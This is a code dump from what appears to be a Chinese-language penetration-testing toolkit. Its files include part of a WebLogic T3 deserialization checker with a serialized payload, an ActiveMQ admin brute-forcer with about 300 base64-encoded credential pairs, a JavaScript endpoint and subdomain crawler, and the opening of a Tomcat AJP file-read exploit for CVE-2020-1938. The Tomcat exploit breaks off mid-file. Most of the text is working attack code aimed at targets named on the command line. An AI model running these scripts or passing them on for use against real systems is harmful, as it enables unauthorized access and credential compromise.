33 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
34 | payload+=data
35 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
36 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
37 | sock.send(payload.decode('hex'))
38 | time.sleep(2)
39 | sock.send(payload.decode('hex'))
40 | res = ''
41 | try:
42 | while True:
43 | res += sock.recv(4096)
44 | time.sleep(0.1)
45 | except Exception as e:
46 | pass
47 | return res
48 |
49 | def checkVul(res,server_addr,index):
50 | p=re.findall(VER_SIG[index], res, re.S)
51 | if len(p)>0:
52 | print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
53 | else:
54 | print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
55 |
56 | def run(dip,dport,index):
57 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
58 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整
59 | sock.settimeout(65)
60 | server_addr = (dip, dport)
61 | t3handshake(sock,server_addr)
62 | buildT3RequestObject(sock,dport)
63 | rs=sendEvilObjData(sock,PAYLOAD[index])
64 | # print 'rs',rs #本地测试的时候这里有个奇怪的报错
65 | checkVul(rs,server_addr,index)
66 |
67 | if __name__=="__main__":
68 | dip = sys.argv[1]
69 | dport = int(sys.argv[2])
70 | print 'Test Address:', dip, dport
71 | try:
72 | run(dip,dport,0)
73 | except:
74 | print(dport,dip,'is not vul.')
75 |
--------------------------------------------------------------------------------
/activemq_vuln/Activemq_weakpasswd.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | import base64
4 |
5 | '''
6 | Usage:
7 | moon.py -u activemq http://xx.xx.xx.xx:xxxx
8 | http://xx.xx.xx.xx:8161/admin/ 弱口令 admin admin
9 | '''
10 |
11 | def attack(URL):
12 | print('[+]开始检测-ActiveMQ弱口令。[+]')
13 | url = URL +'/admin'
14 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
15 | headers={"User-Agent":user_agent}
16 | passwords = ['YWRtaW46IUAjJCVeJio=', 'YWRtaW46IUAjJCVeJg==', 'YWRtaW46IUAjJCVe', 'YWRtaW46IUAjJCU=', 'YWRtaW46IUAjJA==', 'YWRtaW46QCMkJV4m', 'YWRtaW46MA==', 'YWRtaW46MDAwMDAw', 'YWRtaW46MDAwMDAwYQ==', 'YWRtaW46MTAwMjAw', 'YWRtaW46MTAxMDEw', 'YWRtaW46MTEwMTEw', 'YWRtaW46MTEwMTIw', 'YWRtaW46MTEwMTIwMTE5', 'YWRtaW46MTExMTE=', 'YWRtaW46MTExMTEx', 'YWRtaW46MTExMTExMQ==', 'YWRtaW46MTExMTExMTE=', 'YWRtaW46MTExMTExMTEx', 'YWRtaW46MTExMTExMTExMQ==', 'YWRtaW46MTExMTExYQ==', 'YWRtaW46MTExMjIy', 'YWRtaW46MTEyMjMz', 'YWRtaW46MTEyMjMzNDQ=', 'YWRtaW46MTEyMzU4MTMyMQ==', 'YWRtaW46MTIxMjEy', 'YWRtaW46MTIxMjEyMTI=', 'YWRtaW46MTIz', 'YWRtaW46MTIzMDAw', 'YWRtaW46MTIzMTIz', 'YWRtaW46MTIzMTIzMTIz', 'YWRtaW46MTIzMTIzYQ==', 'YWRtaW46MTIzMzIx', 'YWRtaW46MTIzNA==', 'YWRtaW46MTIzNDQzMjE=', 'YWRtaW46MTIzNDU=', 'YWRtaW46MTIzNDU1NDMyMQ==', 'YWRtaW46MTIzNDU2Li4=', 'YWRtaW46MTIzNDU2', 'YWRtaW46MTIzNDU2Nw==', 'YWRtaW46MTIzNDU2Nzg=', 'YWRtaW46MTIzNDU2Nzg5Li4=', 'YWRtaW46MTIzNDU2Nzg5', 'YWRtaW46MTIzNDU2Nzg5MA==', 'YWRtaW46MTIzNDU2Nzg5MDA=', 'YWRtaW46MTIzNDU2Nzg5MQ==', 'YWRtaW46MTIzNDU2Nzg5MTA=', 'YWRtaW46MTIzNDU2Nzg5OQ==', 'YWRtaW46MTIzNDU2Nzg5YQ==', 'YWRtaW46MTIzNDU2Nzg5YWJj', 'YWRtaW46MTIzNDU2Nzg5cQ==', 'YWRtaW46MTIzNDU2Nzg5cXE=', 'YWRtaW46MTIzNDU2YQ==', 'YWRtaW46MTIzNDU2YWE=', 'YWRtaW46MTIzNDU2YUFA', 'YWRtaW46MTIzNDU2YWJj', 'YWRtaW46MTIzNDU2YXNk', 'YWRtaW46MTIzNDU2cQ==', 'YWRtaW46MTIzNDU2cXE=', 'YWRtaW46MTIzNDVh', 'YWRtaW46MTIzNHF3ZXI=', 'YWRtaW46MTIzNjU0', 'YWRtaW46MTIzNjU0Nzg5', 'YWRtaW46MTIzNjk4NzQ1', 'YWRtaW46MTIzYWJj', 'YWRtaW46MTIzcXdl', 'YWRtaW46MTIzcXdlYXNk', 'YWRtaW46MTIzJHF3ZVI=', 'YWRtaW46MTJxd2Fzeng=', 'YWRtaW46MTMxMzEz', 'YWRtaW46MTMxNDUyMA==', 'YWRtaW46MTMxNDUyMDUyMA==', 'YWRtaW46MTMxNDUyMQ==', 'YWRtaW46MTM1NzkyNDY4', 'YWRtaW46MTM1NzkyNDY4MA==', 'YWRtaW46MTQ3MjU4', 'YWRtaW46MTQ3MjU4MzY5', 'YWRtaW46MTQ3MjU4MzY5MA==', 'YWRtaW46MTU5MzU3', 'YWRtaW46MTU5NzUz', 'YWRtaW46MTYzLmNvbQ==', 'YWRtaW46MTY4MTY4', 'YWRtaW46MUEyQjNDNEQ=', 'YWRtaW46MWcydzNlNHI=', 'YWRtaW46MSBvciAxPTE=', 'YWRtaW46MScgb3IgJzEnPScx', 'YWRtaW46MSIgb3IgIjEiPSIx', 'YWRtaW46MScgb3JkZXIgYnkgMS0t', 'YWRtaW46MScgb3JkZXIgYnkgMTAtLQ==', 'YWRtaW46MXAybzNp', 'YWRtaW46MXEydzNl', 'YWRtaW46MXEydzNlNHI=', 'YWRtaW46MXEydzNlNHI1dA==', 'YWRtaW46MXFhejJ3c3g=', 'YWRtaW46MXFheiFRQVo=', 'YWRtaW46MXFhekBXU1g=', 'YWRtaW46MXFhenhzdzI=', 'YWRtaW46MjIyMjIy', 'YWRtaW46MjIyMjIyMg==', 'YWRtaW46MjIyMjIyMjI=', 'YWRtaW46MzE0MTU5MjY=', 'YWRtaW46MzMzMzMz', 'YWRtaW46M2VkYyRSRlY=', 'YWRtaW46NDU2ODUy', 'YWRtaW46NTIwMTMxNA==', 'YWRtaW46NTIwMTMxNDUyMA==', 'YWRtaW46NTIwMTMxNGE=', 'YWRtaW46NTIwNTIw', 'YWRtaW46NTIxMTMxNA==', 'YWRtaW46NTIxNTIx', 'YWRtaW46NTU1NTU1', 'YWRtaW46NTU1NTU1NTU=', 'YWRtaW46NTg0MTMxNDUyMA==', 'YWRtaW46NTg0NTIw', 'YWRtaW46NTg0NTIwMTMxNA==', 'YWRtaW46NjU0MzIx', 'YWRtaW46NjY2NjY2', 'YWRtaW46NjY2ODg4', 'YWRtaW46NzQxODUyOTYz', 'YWRtaW46NzUzOTUx', 'YWRtaW46Nzc1ODI1OA==', 'YWRtaW46Nzc1ODUyMQ==', 'YWRtaW46Nzc3Nzc3', 'YWRtaW46Nzc3Nzc3Nw==', 'YWRtaW46Nzc3Nzc3Nzc=', 'YWRtaW46Nzg5NDU2', 'YWRtaW46Nzg5NDU2MTIz', 'YWRtaW46Nzg5NDU2MTIzMA==', 'YWRtaW46NzkwMTE5', 'YWRtaW46ODA0ODY=', 'YWRtaW46ODg4ODg4', 'YWRtaW46ODg4ODg4ODg=', 'YWRtaW46ODg4OTk5', 'YWRtaW46OTYwNjI4', 'YWRtaW46OTg3NjU0', 'YWRtaW46OTg3NjU0MzIx', 'YWRtaW46OTg3NjU0MzIxMA==', 'YWRtaW46OTk5OTk5', 'YWRtaW46OTk5OTk5OTk=', 'YWRtaW46OTk5OTk5OTk5', 'YWRtaW46YTAwMDAwMA==', 'YWRtaW46YTExMTExMQ==', 'YWRtaW46YTEyMzEyMw==', 'YWRtaW46YTEyMzMyMQ==', 'YWRtaW46YTEyMzQ1', 'YWRtaW46YTEyM180NTY=', 'YWRtaW46YTEyMzQ1Ng==', 'YWRtaW46YTEyMzQ1Njc4', 'YWRtaW46YTEyMzQ1Njc4OQ==', 'YWRtaW46YTFiMmMz', 'YWRtaW46YTUyMDEzMTQ=', 'YWRtaW46QWFAMTIzNDU=', 'YWRtaW46QWFAMTIzNDU2', 'YWRtaW46QWExMjM0NTYh', 'YWRtaW46QWExMjM0NTYu', 'YWRtaW46QWExMjM0NTY=', 'YWRtaW46QWExMjM0NTY3IQ==', 'YWRtaW46YWExMjM0NTY3ODk=', 'YWRtaW46YWFhMTEx', 'YWRtaW46YWFhMTIz', 'YWRtaW46YWFhMTIzNDU2', 'YWRtaW46YWFhYWFh', 'YWRtaW46YWJjMTIz', 'YWRtaW46YWJjMTIzNDU2', 'YWRtaW46YWJjMTIzNDU2Nzg5', 'YWRtaW46YWJjYWJj', 'YWRtaW46YWJjZDEyMw==', 'YWRtaW46YWJjZDEyMzQ=', 'YWRtaW46YWJjZDEyMzQ1Ng==', 'YWRtaW46YWJjZGVm', 'YWRtaW46YWRtaW4=', 'YWRtaW46YWRtaW44ODg=', 'YWRtaW46YWRtaW5pc3RyYXRvcg==', 'YWRtaW46YWluaTEzMTQ=', 'YWRtaW46YXB0eDQ4Njk=', 'YWRtaW46YXMxMjM0NTY=', 'YWRtaW46YXNkMTIz', 'YWRtaW46YXNkMTIzNDU2', 'YWRtaW46YXNkYXNk', 'YWRtaW46YXNkYXNkMTIz', 'YWRtaW46YXNkZg==', 'YWRtaW46YXNkZmdo', 'YWRtaW46YXNkZmdoamts', 'YWRtaW46YmFuZ29uZ3NoaQ==', 'YWRtaW46Y2FvbmltYQ==', 'YWRtaW46Y2FvbmltYTEyMw==', 'YWRtaW46Y29tcHV0ZXI=', 'YWRtaW46Zm9vdGJhbGw=', 'YWRtaW46ZnVja3lvdQ==', 'YWRtaW46ZnVja3lvdTE=', 'YWRtaW46Z3dlcnR5', 'YWRtaW46Z3dlcnR5MTIz', 'YWRtaW46aGVsbG8xMjM0', 'YWRtaW46aWxvdmV5b3U=', 'YWRtaW46aWxvdmV5b3Ux', 'YWRtaW46bG92ZQ==', 'YWRtaW46bG92ZTEyMw==', 'YWRtaW46bG92ZTEzMTQ=', 'YWRtaW46bXlzcGFjZTE=', 'YWRtaW46bmloYW8xMjM=', 'YWRtaW46bnVsbA==', 'YWRtaW46cGFzc3dk', 'YWRtaW46cGFzc3dvcmQ=', 'YWRtaW46cGFzc3dvcmQx', 'YWRtaW46UGFzc3dvcmQy', 'YWRtaW46UG1zQDEyMzQ=', 'YWRtaW46cHJpbmNlc3M=', 'YWRtaW46cHJpbmNlc3Mx', 'YWRtaW46UEBzc3cwcmQ=', 'YWRtaW46cEBzc3dvcmQ=', 'YWRtaW46cTEyMzQ1Ng==', 'YWRtaW46cTEyMzQ1Njc4OQ==', 'YWRtaW46cTF3MmUz', 'YWRtaW46cTF3MmUzcjQ=', 'YWRtaW46cTF3MkUjUiQ=', 'YWRtaW46UUFaMTIz', 'YWRtaW46cWF6MTIzNDU2', 'YWRtaW46IVFBWjJ3c3g=', 'YWRtaW46cWF6d3N4', 'YWRtaW46cWF6d3N4MTIz', 'YWRtaW46cWF6d3N4ZWRj', 'YWRtaW46IVFBWnhzdzI=', 'YWRtaW46cWF6eHN3MjE=', 'YWRtaW46cXExMjMxMjM=', 'YWRtaW46cXExMjM0NTY=', 'YWRtaW46cXExMjM0NTY3ODk=', 'YWRtaW46cXExMzE0NTIw', 'YWRtaW46cXE1MjAxMzE0', 'YWRtaW46cXdlMTIz', 'YWRtaW46cXdlMTIzNDU2', 'YWRtaW46cXdlYXNk', 'YWRtaW46cXdlcjEyMzQ=', 'YWRtaW46cXdlcnR5', 'YWRtaW46cXdlcnR5MQ==', 'YWRtaW46UXdlcnR5MTI=', 'YWRtaW46cXdlcnR5MTIz', 'YWRtaW46UXdlcnR5MTIzNDU=', 'YWRtaW46cXdlcnR5dWlvcA==', 'YWRtaW46cm9vdA==', 'YWRtaW46cm9vdEBXSlM=', 'YWRtaW46czEyMzQ1Ng==', 'YWRtaW46c3Vuc2hpbmU=', 'YWRtaW46dGFyZ2V0MTIz', 'YWRtaW46dGVzdA==', 'YWRtaW46dGVzdDEyMw==', 'YWRtaW46dGVzdGo=', 'YWRtaW46VXNAMTIzNDU=', 'YWRtaW46dXNlcm5hbWU=', 'YWRtaW46VXNyMTIzNDU=', 'YWRtaW46dzEyMzQ1Ng==', 'YWRtaW46dzEyMzQ1Njc4OQ==', 'YWRtaW46d2FuZzEyMw==', 'YWRtaW46d2FuZzEyMzQ1Ng==', 'YWRtaW46d29haW5p', 'YWRtaW46d29haW5pMTIz', 'YWRtaW46d29haW5pMTMxNA==', 'YWRtaW46d29haW5pMTMxNDUyMA==', 'YWRtaW46d29haW5pNTIw', 'YWRtaW46d29haW5pNTIx', 'YWRtaW46QFdTWGNkZTM=', 'YWRtaW46V3dfMTIzNDU2', 'YWRtaW46d3d3MTIzNDU2', 'YWRtaW46ejEyMzQ1Ng==', 'YWRtaW46ejEyMzQ1Njc4OQ==', 'YWRtaW46emFxMTJ3c3g=', 'YWRtaW46WkFRITJ3c3g=', 'YWRtaW46emhhbmcxMjM=', 'YWRtaW46enhjMTIz', 'YWRtaW46enhjMTIzNDU2', 'YWRtaW46enhjdmJubQ==', 'YWRtaW46enhjdmJubTEyMw==', 'YWRtaW46VGVzdDEyMyQ=', 'YWRtaW46MXEydzNlNHI1dA==']
17 | try:
18 | requests.get(url, headers=headers)
19 | verify_response = requests.get(url, headers=headers)
20 | if verify_response.status_code == 401:
21 | print('[*]存在web管理界面,开始爆破:'+url)
22 | for passwd in passwords:
23 | try:
24 | headers={"User-Agent":user_agent,"Authorization":'Basic '+passwd}
25 | verify_response = requests.get(url, headers=headers)
26 | if verify_response.status_code == 200:
27 | print('发现弱口令:'+str(base64.b64decode(passwd), "utf-8"))
28 | break
29 | except Exception:
30 | pass
31 | else:
32 | print('未发现管理页面:'+url)
33 | except Exception:
34 | print("检测错误,未发现漏洞。")
35 | print('[+]检测结束-ActiveMQ弱口令。[+]')
36 | print('\n')
37 |
38 |
39 | if __name__ == "__main__":
40 | attack()
41 |
--------------------------------------------------------------------------------
/js_find/js_find.py:
--------------------------------------------------------------------------------
1 |
2 | # coding: utf-8
3 | # 此页面代码主体修改自 https://threezh1.github.io/ By Threezh1
4 |
5 | import requests, argparse, sys, re
6 | from requests.packages import urllib3
7 | from urllib.parse import urlparse
8 | from bs4 import BeautifulSoup
9 |
10 |
11 | def parse_args():
12 | parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -u http://www.baidu.com")
13 | parser.add_argument("-u", "--url", help="The website")
14 | parser.add_argument("-f", "--file", help="The file contains url or js")
15 | parser.add_argument("-ou", "--outputurl", help="Output file name. ")
16 | parser.add_argument("-os", "--outputsubdomain", help="Output file name. ")
17 | parser.add_argument("-j", "--js", help="Find in js file", action="store_true")
18 | parser.add_argument("-d", "--deep",help="Deep find", action="store_true")
19 | return parser.parse_args()
20 |
21 |
22 | # Regular expression comes from https://github.com/GerbenJavado/LinkFinder
23 | def extract_URL(JS):
24 | pattern_raw = r"""
25 | (?:"|') # Start newline delimiter
26 | (
27 | ((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or //
28 | [^"'/]{1,}\. # Match a domainname (any character + dot)
29 | [a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path
30 | |
31 | ((?:/|\.\./|\./) # Start with /,../,./
32 | [^"'><,;| *()(%%$^/\\\[\]] # Next character can't be...
33 | [^"'><,;|()]{1,}) # Rest of the characters can't be
34 | |
35 | ([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with /
36 | [a-zA-Z0-9_\-/]{1,} # Resource name
37 | \.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action)
38 | (?:[\?|/][^"|']{0,}|)) # ? mark with parameters
39 | |
40 | ([a-zA-Z0-9_\-]{1,} # filename
41 | \.(?:php|asp|aspx|jsp|json|
42 | action|html|js|txt|xml) # . + extension
43 | (?:\?[^"|']{0,}|)) # ? mark with parameters
44 | )
45 | (?:"|') # End newline delimiter
46 | """
47 | pattern = re.compile(pattern_raw, re.VERBOSE)
48 | result = re.finditer(pattern, str(JS))
49 | if result == None:
50 | return None
51 | js_url = []
52 | return [match.group().strip('"').strip("'") for match in result
53 | if match.group() not in js_url]
54 |
55 |
56 | # Get the page source
57 | def Extract_html(URL):
58 | header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
59 | try:
60 | raw = requests.get(URL, headers = header, timeout=3, verify=False)
61 | raw = raw.content.decode("utf-8", "ignore")
62 | return raw
63 | except:
64 | return None
65 |
66 |
67 | # Handling relative URLs
68 | def process_url(URL, re_URL):
69 | black_url = ["javascript:"] # Add some keyword for filter url.
70 | URL_raw = urlparse(URL)
71 | ab_URL = URL_raw.netloc
72 | host_URL = URL_raw.scheme
73 | if re_URL[0:2] == "//":
74 | result = host_URL + ":" + re_URL
75 | elif re_URL[0:4] == "http":
76 | result = re_URL
77 | elif re_URL[0:2] != "//" and re_URL not in black_url:
78 | if re_URL[0:1] == "/":
79 | result = host_URL + "://" + ab_URL + re_URL
80 | else:
81 | if re_URL[0:1] == ".":
82 | if re_URL[0:2] == "..":
83 | result = host_URL + "://" + ab_URL + re_URL[2:]
84 | else:
85 | result = host_URL + "://" + ab_URL + re_URL[1:]
86 | else:
87 | result = host_URL + "://" + ab_URL + "/" + re_URL
88 | else:
89 | result = URL
90 | return result
91 |
92 |
93 | def find_last(string,str):
94 | positions = []
95 | last_position=-1
96 | while True:
97 | position = string.find(str,last_position+1)
98 | if position == -1:break
99 | last_position = position
100 | positions.append(position)
101 | return positions
102 |
103 |
104 | def find_by_url(url, js = False):
105 | if js == False:
106 | html_raw = Extract_html(url)
107 | if html_raw == None:
108 | print("Fail to access " + url)
109 | return None
110 | html = BeautifulSoup(html_raw, "html.parser")
111 | html_scripts = html.findAll("script")
112 | script_array = {}
113 | script_temp = ""
114 | for html_script in html_scripts:
115 | script_src = html_script.get("src")
116 | if script_src == None:
117 | script_temp += html_script.get_text() + "\n"
118 | else:
119 | purl = process_url(url, script_src)
120 | script_array[purl] = Extract_html(purl)
121 | script_array[url] = script_temp
122 | allurls = []
123 | for script in script_array:
124 | temp_urls = extract_URL(script_array[script])
125 | if len(temp_urls) == 0: continue
126 | for temp_url in temp_urls:
127 | allurls.append(process_url(script, temp_url))
128 | result = []
129 | for singerurl in allurls:
130 | url_raw = urlparse(url)
131 | domain = url_raw.netloc
132 | positions = find_last(domain, ".")
133 | miandomain = domain
134 | if len(positions) > 1:miandomain = domain[positions[-2] + 1:]
135 | suburl = urlparse(singerurl)
136 | subdomain = suburl.netloc
137 | if miandomain in subdomain or subdomain.strip() == "":
138 | if singerurl.strip() not in result:
139 | result.append(singerurl)
140 | return result
141 | return sorted(set(extract_URL(Extract_html(url)))) or None
142 |
143 |
144 | def find_subdomain(urls, mainurl):
145 | url_raw = urlparse(mainurl)
146 | domain = url_raw.netloc
147 | miandomain = domain
148 | positions = find_last(domain, ".")
149 | if len(positions) > 1:miandomain = domain[positions[-2] + 1:]
150 | subdomains = []
151 | for url in urls:
152 | suburl = urlparse(url)
153 | subdomain = suburl.netloc
154 | if subdomain.strip() == "": continue
155 | if miandomain in subdomain:
156 | if subdomain not in subdomains:
157 | subdomains.append(subdomain)
158 | return subdomains
159 |
160 |
161 | def find_by_url_deep(url):
162 | html_raw = Extract_html(url)
163 | if html_raw == None:
164 | print("Fail to access " + url)
165 | return None
166 | html = BeautifulSoup(html_raw, "html.parser")
167 | html_as = html.findAll("a")
168 | links = []
169 | for html_a in html_as:
170 | src = html_a.get("href")
171 | if src == "" or src == None: continue
172 | link = process_url(url, src)
173 | if link not in links:
174 | links.append(link)
175 | if links == []: return None
176 | print("ALL Find " + str(len(links)) + " links")
177 | urls = []
178 | i = len(links)
179 | for link in links:
180 | temp_urls = find_by_url(link)
181 | if temp_urls == None: continue
182 | print("Remaining " + str(i) + " | Find " + str(len(temp_urls)) + " URL in " + link)
183 | for temp_url in temp_urls:
184 | if temp_url not in urls:
185 | urls.append(temp_url)
186 | i -= 1
187 | return urls
188 |
189 |
190 | def find_by_file(file_path, js=False):
191 | with open(file_path, "r") as fobject:
192 | links = fobject.read().split("\n")
193 | if links == []: return None
194 | print("ALL Find " + str(len(links)) + " links")
195 | urls = []
196 | i = len(links)
197 | for link in links:
198 | if js == False:
199 | temp_urls = find_by_url(link)
200 | else:
201 | temp_urls = find_by_url(link, js=True)
202 | if temp_urls == None: continue
203 | print(str(i) + " Find " + str(len(temp_urls)) + " URL in " + link)
204 | for temp_url in temp_urls:
205 | if temp_url not in urls:
206 | urls.append(temp_url)
207 | i -= 1
208 | return urls
209 |
210 |
211 | def giveresult(urls, domian):
212 | print("Find " + str(len(urls)) + " URL:")
213 | for url in urls:
214 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'Connection': 'close'}
215 | try:
216 | response = requests.get(url, headers=headers, timeout=60, verify=False).status_code
217 | response_len = len(requests.get(url, headers=headers, timeout=60, verify=False).text)
218 | print('status_code:', ' ',str(response), ' ', 'response_len:', str(response_len),' ',url)
219 | continue
220 | except Exception as e:
221 | print(url, '页面访问错误:', f'Error2: {str(e)}')
222 | continue
223 | # print(url)
224 | subdomains = find_subdomain(urls, domian)
225 | print("\nFind " + str(len(subdomains)) + " Subdomain:")
226 | for subdomain in subdomains:
227 | print(subdomain)
228 |
229 |
230 | def attack(URL):
231 | urllib3.disable_warnings()
232 | args_url = URL
233 | try:
234 | urls = find_by_url(args_url)
235 | giveresult(urls, args_url)
236 | print('[+]当前页面爬取完毕!')
237 | except Exception:
238 | print('[-]当前页面爬取失败!')
239 | try:
240 | urls = find_by_url_deep(args_url)
241 | print('[+]深度爬取成功!')
242 | except Exception:
243 | print('[-]深度爬取失败!')
244 |
245 |
246 | if __name__ == "__main__":
247 | attack()
248 |
--------------------------------------------------------------------------------
/tomcat/CVE_2020_1938.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # CNVD-2020-10487 / CVE-2020-1938
3 | # https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py 核心代码出自此处
4 | from socket import *
5 | import struct
6 | from io import StringIO
7 |
8 |
9 | '''
10 | Usage:
11 | moon.py -u tomcat http://127.0.0.1:8080
12 | 上面链接带不带端口无所谓,不带端口默认检测8009,带端口会检测链接中的端口和8009,不会检测两次8009
13 | 受影响版本
14 |
15 | Apache Tomcat 6
16 | Apache Tomcat 7 < 7.0.100
17 | Apache Tomcat 8 < 8.5.51
18 | Apache Tomcat 9 < 9.0.31
19 | 不受影响版本
20 | 1. Apache Tomcat = 7.0.100
21 | 2. Apache Tomcat = 8.5.51
22 | 3. Apache Tomcat = 9.0.31
23 | '''
24 |
25 |
26 | def pack_string(s):
27 | if s is None:
28 | return struct.pack(">h", -1)
29 | l = len(s)
30 | return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
31 |
32 |
33 | def unpack(stream, fmt):
34 | size = struct.calcsize(fmt)
35 | buf = stream.read(size)
36 | return struct.unpack(fmt, buf)
37 |
38 |
39 | def unpack_string(stream):
40 | size, = unpack(stream, ">h")
41 | if size == -1: # null string
42 | return None
43 | res, = unpack(stream, "%ds" % size)
44 | stream.read(1) # \0
45 | return res
46 |
47 |
48 | class NotFoundException(Exception):
49 | pass
50 |
51 |
52 | class AjpBodyRequest(object):
53 | # server == web server, container == servlet
54 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
55 | MAX_REQUEST_LENGTH = 8186
56 |
57 | def __init__(self, data_stream, data_len, data_direction=None):
58 | self.data_stream = data_stream
59 | self.data_len = data_len
60 | self.data_direction = data_direction
61 |
62 | def serialize(self):
63 | data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
64 | if len(data) == 0:
65 | return struct.pack(">bbH", 0x12, 0x34, 0x00)
66 | else:
67 | res = struct.pack(">H", len(data))
68 | res += data
69 | if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
70 | header = struct.pack(">bbH", 0x12, 0x34, len(res))
71 | else:
72 | header = struct.pack(">bbH", 0x41, 0x42, len(res))
73 | return header + res
74 |
75 | def send_and_receive(self, socket, stream):
76 | while True:
77 | data = self.serialize()
78 | socket.send(data)
79 | r = AjpResponse.receive(stream)
80 | while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
81 | r = AjpResponse.receive(stream)
82 |
83 | if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
84 | break
85 |
86 |
87 | class AjpForwardRequest(object):
88 | _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(
89 | 28)
90 | REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE,
91 | 'TRACE': TRACE}
92 | # server == web server, container == servlet
93 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
94 | COMMON_HEADERS = ["SC_REQ_ACCEPT",
95 | "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE",
96 | "SC_REQ_AUTHORIZATION",
97 | "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE",
98 | "SC_REQ_COOKIE2",
99 | "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
100 | ]
101 | ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert",
102 | "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
103 |
104 | def __init__(self, data_direction=None):
105 | self.prefix_code = 0x02
106 | self.method = None
107 | self.protocol = None
108 | self.req_uri = None
109 | self.remote_addr = None
110 | self.remote_host = None
111 | self.server_name = None
112 | self.server_port = None
113 | self.is_ssl = None
114 | self.num_headers = None
115 | self.request_headers = None
116 | self.attributes = None
117 | self.data_direction = data_direction
118 |
119 | def pack_headers(self):
120 | self.num_headers = len(self.request_headers)
121 | res = ""
122 | res = struct.pack(">h", self.num_headers)
123 | for h_name in self.request_headers:
124 | if h_name.startswith("SC_REQ"):
125 | code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
126 | res += struct.pack("BB", 0xA0, code)
127 | else:
128 | res += pack_string(h_name)
129 |
130 | res += pack_string(self.request_headers[h_name])
131 | return res
132 |
133 | def pack_attributes(self):
134 | res = b""
135 | for attr in self.attributes:
136 | a_name = attr['name']
137 | code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
138 | res += struct.pack("b", code)
139 | if a_name == "req_attribute":
140 | aa_name, a_value = attr['value']
141 | res += pack_string(aa_name)
142 | res += pack_string(a_value)
143 | else:
144 | res += pack_string(attr['value'])
145 | res += struct.pack("B", 0xFF)
146 | return res
147 |
148 | def serialize(self):
149 | res = ""
150 | res = struct.pack("bb", self.prefix_code, self.method)
151 | res += pack_string(self.protocol)
152 | res += pack_string(self.req_uri)
153 | res += pack_string(self.remote_addr)
154 | res += pack_string(self.remote_host)
155 | res += pack_string(self.server_name)
156 | res += struct.pack(">h", self.server_port)
157 | res += struct.pack("?", self.is_ssl)
158 | res += self.pack_headers()
159 | res += self.pack_attributes()
160 | if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
161 | header = struct.pack(">bbh", 0x12, 0x34, len(res))
162 | else:
